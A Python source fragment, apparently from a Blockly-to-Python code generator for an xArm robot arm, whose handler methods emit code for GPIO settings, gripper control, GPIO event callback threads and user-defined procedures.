if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
io = fields[0].text
value = 0 if fields[1].text == 'LOW' else 1
delay_sec = fields[2].text if len(fields) > 2 else 0
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital({}, {}, delay_sec={})'.format(prefix, io, value, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_digital_with_xyz_do(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = 0 if fields[5].text == 'LOW' else 1
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_digital_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_digital_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog_with_xyz(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[0].text
y = fields[1].text
z = fields[2].text
xyz = list(map(float, [x, y, z]))
tol_r = fields[3].text
io = fields[4].text
value = fields[5].text
# io = self.get_node('field', block).text
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} analog with pos {}'.format(prefix, io, xyz))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog_with_xyz({}, {}, {}, {})'.format(prefix, io, value, xyz, tol_r))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog_with_xyz, code={{}}\'.format(code))'.format(prefix))
def _handle_gpio_set_controller_analog(self, block, prefix='', arg_map=None):
io = self.get_node('field', block).text
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set cgpio-{} digital'.format(prefix, io))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_cgpio_analog({}, {})'.format(prefix, io, value))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_cgpio_analog, code={{}}\'.format(code))'.format(prefix))
def _handle_set_collision_sensitivity(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_collision_sensitivity({})'.format(prefix, value))
def _handle_set_teach_sensitivity(self, block, prefix=''):
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_teach_sensitivity({})'.format(prefix, value))
def _handle_set_tcp_load(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
weight = fields[1].text
x = fields[2].text
y = fields[3].text
z = fields[4].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{} arm.set_state(0)'.format(prefix))
# self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# weight = self.get_nodes('field', root=values[0], descendant=True)[0].text
# x = self.get_nodes('field', root=values[1], descendant=True)[0].text
# y = self.get_nodes('field', root=values[2], descendant=True)[0].text
# z = self.get_nodes('field', root=values[3], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_load({}, [{}, {}, {}])'.format(prefix, weight, x, y, z))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_gravity_direction(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
x = self.get_nodes('field', root=values[0], descendant=True)[0].text
y = self.get_nodes('field', root=values[1], descendant=True)[0].text
z = self.get_nodes('field', root=values[2], descendant=True)[0].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_gravity_direction([{}, {}, {}])'.format(prefix, x, y, z))
def _handle_set_tcp_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_tcp_offset([{}, {}, {}, {}, {}, {}], wait=True)'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
# values = self.get_nodes('value', root=block)
# x = self.get_nodes('field', root=values[0], descendant=True)[0].text
# y = self.get_nodes('field', root=values[1], descendant=True)[0].text
# z = self.get_nodes('field', root=values[2], descendant=True)[0].text
# roll = self.get_nodes('field', root=values[3], descendant=True)[0].text
# pitch = self.get_nodes('field', root=values[4], descendant=True)[0].text
# yaw = self.get_nodes('field', root=values[5], descendant=True)[0].text
# self._append_to_file('{}arm.set_tcp_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
# self._append_to_file('{}arm.set_state(0)'.format(prefix))
def _handle_set_world_offset(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
x = fields[1].text
y = fields[2].text
z = fields[3].text
roll = fields[4].text
pitch = fields[5].text
yaw = fields[6].text
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_world_offset([{}, {}, {}, {}, {}, {}])'.format(prefix, x, y, z, roll, pitch, yaw))
self._append_to_file('{} arm.set_state(0)'.format(prefix))
self._append_to_file('{} time.sleep(0.5)'.format(prefix))
def _handle_gripper_set(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
if fields is not None and len(fields) >= 3:
pos = fields[0].text
speed = fields[1].text
wait = fields[2].text == 'TRUE'
else:
values = self.get_nodes('value', root=block)
pos = self.get_nodes('field', root=values[0], descendant=True)[0].text
speed = self.get_nodes('field', root=values[1], descendant=True)[0].text
wait = self.get_nodes('field', root=values[2], descendant=True)[0].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# set gripper position and '.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_gripper_position({}, wait={}, speed={}, auto_enable=True)'.format(prefix, pos, wait, speed))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_position, code={{}}\'.format(code))'.format(prefix))
def _handle_gripper_set_status(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
status = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='delay')
delay_sec = fields[0].text if len(fields) > 0 else 0
if self._show_comment:
self._append_to_file('{}# set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm._arm.set_gripper_status({}, delay_sec={})'.format(prefix, status, delay_sec))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_gripper_status, code={{}}\'.format(code))'.format(prefix))
def _handle_set_bio_gripper_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_bio_gripper_enable(True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_bio_gripper_enable, code={{}}\'.format(code))'.format(prefix))
# self._append_to_file('{}expired = time.time() + 2'.format(prefix))
# self._append_to_file('{}while not params[\'quit\'] and time.time() < expired:'.format(prefix))
# self._append_to_file('{} time.sleep(0.1)'.format(prefix))
def _handle_set_bio_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='status')
on = True if fields[0].text == 'TRUE' else False
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if on:
if self._show_comment:
self._append_to_file('{}# open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.open_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'open_bio_gripper, code={{}}\'.format(code))'.format(prefix))
else:
if self._show_comment:
self._append_to_file('{}# close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.close_bio_gripper(speed={}, wait={})'.format(prefix, speed, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'close_bio_gripper, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_init(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set_robotiq_init()'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_reset()'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_reset, code={{}}\'.format(code))'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_activate(wait=True)'.format(prefix))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_activate, code={{}}\'.format(code))'.format(prefix))
def _handle_set_robotiq_gripper(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block, name='pos')
pos = int(fields[0].text)
fields = self.get_nodes('field', root=block, name='speed')
speed = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='force')
force = int(fields[0].text) if fields and len(fields) > 0 else 0xFF
fields = self.get_nodes('field', root=block, name='wait')
wait = fields[0].text == 'TRUE' if fields and len(fields) > 0 else False
if self._show_comment:
self._append_to_file('{}# robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code, _ = arm.robotiq_set_position({}, speed={}, force={}, wait={})'.format(prefix, pos, speed, force, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'robotiq_set_position, code={{}}\'.format(code))'.format(prefix))
def __handle_gpio_event(self, gpio_type, block, prefix='', arg_map=None):
if gpio_type.startswith('listen'):
if gpio_type == 'listen_tgpio_digital':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_digital = True'.format(prefix))
elif gpio_type == 'listen_tgpio_analog':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_tgpio_analog = True'.format(prefix))
elif gpio_type == 'listen_cgpio_state':
self._append_to_file('\n{}params[\'events\'][\'gpio\'].listen_cgpio_state = True'.format(prefix))
else:
return
old_prefix = prefix
else:
fields = self.get_nodes('field', root=block)
io = fields[0].text
trigger = fields[1].text
if 'gpio' not in self._events:
num = 1
else:
if gpio_type not in self._events['gpio']:
num = 1
else:
num = self._events['gpio'][gpio_type] + 1
if gpio_type == 'tgpio_digital':
name = 'tool_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} DIGITAL is changed callback'.format(prefix, io))
elif gpio_type == 'tgpio_analog':
name = 'tool_gpio_{}_analog_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Tool GPIO-{} ANALOG is changed callback'.format(prefix, io))
elif gpio_type == 'cgpio_digital':
name = 'controller_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Contoller GPIO-{} DIGITAL is {} callback'.format(prefix, io, trigger))
elif gpio_type == 'cgpio_analog':
name = 'controller_gpio_{}_digital_is_changed_callback_{}'.format(io, num)
self._append_to_file('\n\n{}# Define Contoller GPIO-{} ANALOG is changed callback'.format(prefix, io))
else:
return
self._append_to_file('{}def {}():'.format(prefix, name))
old_prefix = prefix
prefix = ' ' + prefix
statement = self.get_node('statement', root=block)
if statement:
self._append_to_file('{}def _callback():'.format(prefix))
self.parse(statement, prefix + ' ', arg_map=arg_map)
self._append_to_file('{}_callback() if not params[\'callback_in_thread\'] else threading.Thread(target=_callback, daemon=True).start()'.format(prefix))
else:
self._append_to_file('{}pass'.format(prefix))
if gpio_type == 'tgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_digital_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'==\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
elif gpio_type == 'tgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].tgpio_analog_callbacks.append({{'
'\'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
elif gpio_type == 'cgpio_digital':
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'digital\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, 1 if trigger == 'HIGH' else 0, '==', name))
elif gpio_type == 'cgpio_analog':
op = self._ops2.get(trigger)
trigger = fields[2].text
self._append_to_file(
'\n{}params[\'events\'][\'gpio\'].cgpio_callbacks.append({{'
'\'type\': \'analog\', \'io\': {}, \'trigger\': {}, \'op\': \'{}\', \'callback\': {}}})'.format(
old_prefix, io, trigger, op, name))
else:
return
self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
if 'gpio' not in self._events:
name2 = 'EventGPIOThread'
self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
'\n threading.Thread.__init__(self, *args, **kwargs)')
self._insert_to_file(self.index, ' self.daemon = True')
self._insert_to_file(self.index, ' self.alive = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = False')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = False')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = False')
self._insert_to_file(self.index, ' self.listen_tgpio_digital = False')
self._insert_to_file(self.index, ' self.listen_tgpio_analog = False')
self._insert_to_file(self.index, ' self.listen_cgpio_state = False')
self._insert_to_file(self.index, ' self.values = {'
'\'tgpio\': {\'digital\': [0] * 2, \'analog\': [0] * 2, \'digital_o\': [0] * 2, \'analog_o\': [0] * 2},'
'\'cgpio\': {\'digital\': [1] * 16, \'analog\': [0] * 2, \'digital_o\': [1] * 16, \'analog_o\': [0] * 2}}')
self._insert_to_file(self.index, ' self.tgpio_digital_callbacks = []')
self._insert_to_file(self.index, ' self.tgpio_analog_callbacks = []')
self._insert_to_file(self.index, ' self.cgpio_callbacks = []')
self._insert_to_file(self.index, '\n def cgpio_digitals_is_matchs_bin(self, bin_val):')
self._insert_to_file(self.index, ' digitals_bin = \'\'.join(map(str, self.values[\'cgpio\'][\'digital\']))')
self._insert_to_file(self.index, ' length = min(len(digitals_bin), len(bin_val))')
self._insert_to_file(self.index, ' bin_val_ = bin_val[::-1]')
self._insert_to_file(self.index, ' for i in range(length):')
self._insert_to_file(self.index, ' if bin_val_[i] != digitals_bin[i]:')
self._insert_to_file(self.index, ' return False')
self._insert_to_file(self.index, ' return True')
self._insert_to_file(self.index, '\n def run(self):')
self._insert_to_file(self.index, ' self.alive = True')
self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._insert_to_file(self.index, ' if self.listen_tgpio_digital or len(self.tgpio_digital_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_digital()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_digital:')
self._insert_to_file(self.index, ' for item in self.tgpio_digital_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'digital\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_digital = True')
self._insert_to_file(self.index, ' if self.listen_tgpio_analog or len(self.tgpio_analog_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_tgpio_analog()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' if self.is_init_tgpio_analog:')
self._insert_to_file(self.index, ' for item in self.tgpio_analog_callbacks:')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(values[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'tgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'tgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'tgpio\'][\'analog\'] = values')
self._insert_to_file(self.index, ' self.is_init_tgpio_analog = True')
self._insert_to_file(self.index, ' if self.listen_cgpio_state or len(self.cgpio_callbacks) > 0:')
self._insert_to_file(self.index, ' _, values = arm.get_cgpio_state()')
self._insert_to_file(self.index, ' if _ == 0:')
self._insert_to_file(self.index, ' digitals = [values[3] >> i & 0x0001 if values[10][i] in [0, 255] else 1 for i in range(len(values[10]))]')
self._insert_to_file(self.index, ' digitals_o = [values[5] >> i & 0x0001 for i in range(len(values[11]))]')
self._insert_to_file(self.index, ' analogs = [values[6], values[7]]')
self._insert_to_file(self.index, ' analogs_o = [values[8], values[9]]')
self._insert_to_file(self.index, ' if self.is_init_cgpio_state:')
self._insert_to_file(self.index, ' for item in self.cgpio_callbacks:')
self._insert_to_file(self.index, ' if item[\'type\'] == \'digital\':')
self._insert_to_file(self.index, ' for io in range(len(digitals)):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(digitals[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'digital\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'digital\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' elif item[\'type\'] == \'analog\':')
self._insert_to_file(self.index, ' for io in range(2):')
self._insert_to_file(self.index, ' if item[\'io\'] == io and eval(\'{} {} {}\'.format(analogs[io], item[\'op\'], item[\'trigger\'])) and not eval(\'{} {} {}\'.format(self.values[\'cgpio\'][\'analog\'][io], item[\'op\'], item[\'trigger\'])):')
# self._insert_to_file(self.index, ' if item[\'io\'] == io and values[io] {op} item[\'trigger\'] and not (values[io] {op} self.values[\'cgpio\'][\'analog\'][io]):'.format(op='item[\'op\']'))
self._insert_to_file(self.index, ' item[\'callback\']()')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital\'] = digitals')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog\'] = analogs')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'digital_o\'] = digitals_o')
self._insert_to_file(self.index, ' self.values[\'cgpio\'][\'analog_o\'] = analogs_o')
self._insert_to_file(self.index, ' self.is_init_cgpio_state = True')
self._insert_to_file(self.index, ' time.sleep(0.1)')
self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
self._events['gpio'] = {}
if not gpio_type.startswith('listen'):
if gpio_type not in self._events['gpio']:
self._events['gpio'][gpio_type] = 2
else:
self._events['gpio'][gpio_type] += 1
self._hasEvent = True
def _handle_event_gpio_digital(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_analog(self, block, prefix='', arg_map=None):
self.__handle_gpio_event('tgpio_analog', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_analog(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_analog', block, prefix, arg_map=arg_map)
def _handle_gpio_controller_digitals_listen(self, block, prefix, arg_map=None):
self.__handle_gpio_event('listen_cgpio_state', block, prefix, arg_map=arg_map)
def _handle_event_gpio_controller_digital_di(self, block, prefix, arg_map=None):
self.__handle_gpio_event('cgpio_digital', block, prefix, arg_map=arg_map)
# def _handle_event_gpio_digital(self, block, prefix=''):
# fields = self.get_nodes('field', root=block)
# io = fields[0].text
# trigger = fields[1].text
#
# if 'gpio' not in self._events:
# num = 1
# else:
# num = self._events['gpio'] + 1
# name = '{}_io{}_is_{}_{}'.format(block.attrib['type'], io, trigger.lower(), num)
# self._append_to_file('\n\n{}# Define TGPIO-{} is {} callback'.format(prefix, io, trigger))
# self._append_to_file('{}def {}():'.format(prefix, name))
# old_prefix = prefix
# prefix = ' ' + prefix
# statement = self.get_node('statement', root=block)
# if statement:
# self.parse(statement, prefix)
# else:
# self._append_to_file('{}pass'.format(prefix))
# self._append_to_file('\n{}params[\'events\'][\'gpio\'].callbacks[\'IO{}\'][{}].append({})'.format(
# old_prefix, io, 1 if trigger == 'HIGH' else 0, name))
# self._append_to_file('{}if not params[\'events\'][\'gpio\'].alive:'.format(old_prefix))
# self._append_to_file('{} params[\'events\'][\'gpio\'].start()'.format(old_prefix))
#
# if 'gpio' not in self._events:
# name2 = 'EventGPIOThread'.format(io, trigger.capitalize())
# self._insert_to_file(self.index, '\n\n# Define GPIO callback handle thread')
# self._insert_to_file(self.index, 'class {}(threading.Thread):'.format(name2))
# self._insert_to_file(self.index, ' def __init__(self, *args, **kwargs):'
# '\n threading.Thread.__init__(self, *args, **kwargs)')
# self._insert_to_file(self.index, ' self.daemon = True')
# self._insert_to_file(self.index, ' self.alive = False')
# self._insert_to_file(self.index, ' self.digital = [-1, -1]')
# self._insert_to_file(self.index, ' self.callbacks = {\'IO0\': {0: [], 1: []}, '
# '\'IO1\': {0: [], 1: []}}')
# self._insert_to_file(self.index, '\n def run(self):')
# self._insert_to_file(self.index, ' self.alive = True')
# self._insert_to_file(self.index, ' while arm.connected and arm.error_code == 0:')
# self._insert_to_file(self.index, ' _, digital = arm.get_tgpio_digital()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' if digital[0] != self.digital[0]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO0\'][digital[0]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if digital[1] != self.digital[1]:')
# self._insert_to_file(self.index, ' for callback in self.callbacks[\'IO1\'][digital[1]]:')
# self._insert_to_file(self.index, ' callback()')
# self._insert_to_file(self.index, ' if _ == 0:')
# self._insert_to_file(self.index, ' self.digital = digital')
# self._insert_to_file(self.index, ' time.sleep(0.1)')
# self._insert_to_file(self.index, '\nparams[\'events\'][\'gpio\'] = {}()'.format(name2))
#
# if 'gpio' not in self._events:
# self._events['gpio'] = 2
# else:
# self._events['gpio'] += 1
#
# self._hasEvent = True
def _handle_procedures_defnoreturn(self, block, prefix='', arg_map=None):
if not self._func_cls_exist:
name = 'MyDef'
self._insert_to_file(self.first_index, '\n\n# Define Mydef class')
self._insert_to_file(self.first_index, 'class {}(object):'.format(name))
self._insert_to_file(self.first_index,
' def __init__(self, *args, **kwargs):\n pass')
self._func_cls_exist = True
field = self.get_node('field', block).text
if not field:
field = '1'
if field not in self._funcs:
name = 'function_{}'.format(self.func_index)
else:
name = self._funcs[field]
self._is_insert = True
try:
args = self.get_nodes('arg', root=self.get_node('mutation', block))
arg_map_ = None
self._append_to_file('\n @classmethod')
if not args:
self._append_to_file(' def {}(cls):'.format(name))
else:
arg_list = [arg.attrib['name'] for arg in args]
# arg_map_ = {arg: arg for i, arg in enumerate(arg_list)}
arg_map_ = {arg: 'arg_{}'.format(i + 1) for i, arg in enumerate(arg_list)}
self._append_to_file(' def {}(cls, {}):'.format(name, ','.join(map(lambda x: arg_map_[x], arg_list))))
# self._append_to_file(' def {}(cls):'.format(name))
prefix = ' '
comment = self.get_node('comment', block).text
self._append_to_file('{}"""'.format(prefix))
self._append_to_file('{}{}'.format(prefix, comment))
self._append_to_file('{}"""'.format(prefix))
statement = self.get_node('statement', root=block)
if statement:
self.parse(statement, prefix, arg_map=arg_map_)
else:
self._append_to_file('{}pass'.format(prefix))
self._funcs[field] = name
return arg_map_
except:
self._succeed = False
self._is_insert = False
def _handle_procedures_defreturn(self, block, prefix='', arg_map=None):
arg_map_ = self._handle_procedures_defnoreturn(block, prefix)
value = self.get_node('value', root=block)
expression = self.__get_condition_expression(value, arg_map=arg_map_)
self._is_insert = True
prefix = ' '
self._append_to_file('{}return {}'.format(prefix, expression))
self._is_insert = False
def _handle_procedures_callnoreturn(self, block, prefix='', arg_map=None):
mutation = self.get_node('mutation', block).attrib['name']
if not mutation:
mutation = '1'
if mutation in self._funcs:
name = self._funcs[mutation]
else:
name = 'function_{}'.format(self.func_index)
args = self.get_nodes('arg', root=self.get_node('mutation', block))
values = self.get_nodes('value', root=block)
if args and values and len(args) == len(values):
self._append_to_file('{}MyDef.{}({})'.format(prefix, name, ','.join([self.__get_condition_expression(val, arg_map=arg_map) for val in values])))
else:
self._append_to_file('{}MyDef.{}()'.format(prefix, name))
# self._append_to_file('{}MyDef.{}()'.format(prefix, name))
self._funcs[mutation] = name
